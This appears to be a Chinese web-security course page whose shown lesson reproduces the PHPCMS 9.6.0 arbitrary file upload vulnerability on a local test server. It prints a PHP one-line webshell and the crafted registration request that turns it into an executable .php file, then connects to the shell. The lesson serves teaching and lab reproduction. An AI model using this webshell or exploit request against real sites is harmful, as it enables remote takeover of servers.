{ "create_date": "2018-4-2", "update_date": "2018-4-10", "username": "靜河流", "views": 6085, "favorator": 2, "publish_doctype": "2" }
返回
章節(jié)
筆記
XSS
1、xss的形成原理
2、xss的分類
3、代碼案例分析
3.1、反射型xss
3.2、存儲型xss
3.3、dom型xss
CSRF
1、csrf的原理與危害
2、csrf的利用分類與案例分析
3、解決方案
SSRF
1、ssrf的原理與危害
2、漏洞代碼示例
3、ssrf的挖掘與防御
XXE
1、基礎知識
2、xxe的原理與案例
SQL Injection
1、sql注入的原理與分類
2、盲注
3、DVWA SQL Injection分析與利用
4、DVWA SQL Injection (Blind)分析與利用
5、Sqlmap盲注利用
6、防范sql注入
File Upload
1、上傳漏洞的原理與總結
2、PHPcms9.6.0 任意文件上傳漏洞利用與分析
3、解析漏洞總結
命令注入(Command Injection)
1、命令注入漏洞
暫無章節(jié)
2、PHPcms9.6.0 任意文件上傳漏洞利用與分析
### 漏洞復現 使用XAMPP搭建好環(huán)境,接著安裝PHPCMS V9.6.0。 [PHPCMS V9.6.0 官方下載地址](http://bbs.phpcms.cn/thread-933447-1-1.html) 在phpcms根目錄下寫入一句話木馬的txt記事本文件: ```<?php @eval($_POST['shell0']);?>``` ![](/upload/attach/201804/201804091754_AN4UEPCA95R6H3H.jpg) 路徑為: http://localhost/phpcms/shell.txt ![](/upload/attach/201804/201804091754_YWK2SKC3PCBUMTE.jpg) 此時是txt記事本文件,解釋器解析不了里面的PHP代碼,所以用菜刀連接失敗。 ![](/upload/attach/201804/201804091755_9KPSP89ESXERJAD.jpg) 打開主頁找到注冊頁面,填寫基本信息,提交用burpsuite抓包: ![](/upload/attach/201804/201804091755_UXDHQQAHN5KE2EU.jpg) ![](/upload/attach/201804/201804091755_A4V4EHNFHNN8B3Z.jpg) send to repeater: 修改request 請求包的payload: ``` siteid=1&modelid=1&username=usera&password=password&pwdconfirm=password&email=usera%40test.com&nickname=nichenga&info[content]=href=http://localhost/phpcms/shell.txt?.php#.jpg&dosubmit=1&protocol= ``` ![](/upload/attach/201804/201804091755_TXU9U6AZ6XWH74D.jpg) response標黃的部分就是返回的shell地址,注意上面我們抓取的modelid值原本為10,payload改成了數字1,目的就是為了在response中顯示shell路徑。 ``` http://localhost/phpcms/uploadfile/2018/0403/20180403044429440.php ``` 這個路徑的文件就是PHP一句話小馬: ![](/upload/attach/201804/201804091755_RDDMD83ZC44R6PD.jpg) 用菜刀連接成功: ![](/upload/attach/201804/201804091756_YX9YBWE9SYQUJ6J.jpg) ### 注:用PHP7版本測試上面的一句話木馬是連接不了的,使用PHP5可以連接成功。 漏洞分析參考p0wd3r的[PHPCMS v9.6.0 任意文件上傳漏洞分析](https://www.seebug.org/vuldb/ssvid-92930)
?
問答
標題
雪幣懸賞
(剩余
0
雪幣)
內容
提交
請掃碼訂閱
有回復時將及時提醒您
其他問答
暫無記錄
筆記
公開筆記
提交
取消
保存
同學筆記({{ other_total }})
我的筆記({{ my_total }})
{{ item.username }}
{{item.video_time_fmt}}
查看完整內容
{{ item.create_date_fmt }}
{{item.is_public == 1 ?"已公開":"未公開"}}
筆記審核中
收起
刪除
編輯
{{ item.likes }}
{{ item.likes }}
采集
已采集
上一頁
下一頁
資料下載
暫無記錄
作業(yè)
暫無記錄
看原圖
看雪SRC
|
關于我們
| 域名:
加速樂
| SSL證書:
亞洲誠信
|
安全網易易盾
?2000 - 2024 看雪 /
滬ICP備2022023406號
/
滬公網安備 31011502006611號
郵件